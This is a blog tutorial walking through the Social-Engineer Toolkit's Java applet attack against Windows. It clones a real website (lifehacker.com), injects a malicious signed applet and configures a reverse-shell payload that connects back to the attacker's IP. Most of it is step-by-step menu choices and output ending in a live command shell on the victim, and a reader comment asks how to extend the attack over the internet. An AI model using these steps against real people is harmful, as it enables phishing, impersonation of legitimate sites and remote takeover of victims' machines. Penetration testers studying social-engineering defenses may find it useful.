Hack windows machines with social engineering toolkit | java signed applet method

In a previous post we saw how to exploit remote windows machines using metasploit java signed applet exploit and doing some social engineering on the user. In this post we shall try a similar hack using the social engineering toolkit. Social engineering toolkit (SET) is an exploitation framework for social engineering attacks like phishing etc.

Launch SET. In back track it can be found in BackTrack > Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > set. Or launch from the terminal

Launch SET

[email protected]:~# cd /pentest/exploits/set/
[email protected]:/pentest/exploits/set# ./set

The main menu would come up.

The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

Select option #1 that is Social-Engineering Attacks to move on to the next menu.

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

From this menu select option #2 Website Attack Vectors. The next menu shall list the attack methods along with their descriptions

1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

Select the first option, Java Applet Attack Method.

1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

Now SET asks if it should use a webpage from an existing list of templates it has, or should it clone a new website and prepare it for the attack. Select 2) Site Cloner. After this SET will ask for some information.







set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address for the reverse connection:192.168.1.7
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:lifehacker.com

[*] Cloning the website: http://lifehacker.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: FL8khGiXAvaXu7
[*] Malicious java applet website prepped for deployment

First it will ask if NAT is needed. If the victim is outside your own network, that is over the internet and you are behind a router in your LAN, then NAT is needed. In our case the victim is on the same LAN so I entered no for NAT.
Next it will ask for the ip address for the reverse connection. This is the ip address that the victim machine will connect to to provide the shell. It should be the access ip of the hacker's machine or where SET is running.

Then SET asks for the url to clone. We entered lifehacker.com. It will clone and create a look alike copy of lifehacker.com and inject the java attack applet in it. Cloning and using an existing website further misleads the victim into thinking the site to be a genuine one if not original.

Select payload

After all this, SET will finally ask for the payload to use.

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
  12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
  13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  15) Import your own executable              Specify a path for your own executable

To brief up, payload is that part of the code that will generate the final shell after the exploitation process. The most commonly used payload is reverse tcp shell. But here we are going to try a new one, the SE toolkit interactive shell, option 11.

set:payloads>11
set:payloads> PORT of the listener [443]:443
[*] Done, moving the payload into the action.
[-] Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...
[*] Stager turned off, prepping direct download payload...
[*] Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Opera, Chrome, and FireFox [--]

[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..


[-] Launching the SET Interactive Shell...
[*] Crypto.Cipher library is installed. AES will be used for socket communication.
[*] All communications will leverage AES 256 and randomized cipher-key exchange.
[*] The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:443

Once SET is listening, its time to open the url in the victim browser. So open the ip address of the hacker computer in the victim computer browser. It will ask to run Java and then popup a confirmation dialog.

java_applet

Shell

Once the victim user clicks Run and allows the applet to run, the hacker machine would get a shell on the victim computer.

192.168.1.2 - - [18/Apr/2013 20:59:18] "GET / HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:18] code 404, message File not found
192.168.1.2 - - [18/Apr/2013 20:59:18] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] code 404, message File not found
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar.pack.gz HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:54] "GET /Gc4pPU HTTP/1.1" 200 -
[*] Connection received from: 192.168.1.2

*** Pick the number of the shell you want ***

1: 192.168.1.2:WINDOWS

Now type 1 and hit enter

set> 1
[*] Dropping into the Social-Engineer Toolkit Interactive Shell.
set:active_target>

This is the SET interactive shell. Type help and hit enter to see the available options of this SET shell. To get the native os shell, type shell and hit enter.

set:active_target>shell
[*] Entering a Windows Command Prompt. Enter your commands below.

set:active_target:shell>dir
 Volume in drive C has no label.
 Volume Serial Number is FC18-53D3

 Directory of C:\Documents and Settings\enlightened\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.64

04/15/2013  02:46 AM    <DIR>          .
04/15/2013  02:46 AM    <DIR>          ..
04/09/2013  01:56 AM        44,521,424 chrome.dll
04/09/2013  01:07 AM           882,175 chrome_100_percent.pak
04/09/2013  01:56 AM            57,296 chrome_frame_helper.dll
04/09/2013  01:56 AM            82,896 chrome_frame_helper.exe
................

This java applet based attack is not actually an exploit, it is the same technique used for browser+java based remote desktop solution. That is, an applet is allowed to run with user privileges, thats all. However can be used by hackers to attack users who are not aware of the phishing and might click run without understanding the consequences.

Last Updated On : 18th April 2013

Subscribe to get updates delivered to your inbox

1 Comment + Add Comment

  • Thank you for the tutorial. I have a question, how do you set up the NAT for outside use? I’m new at this and trying to learn. Thanks!

Leave a comment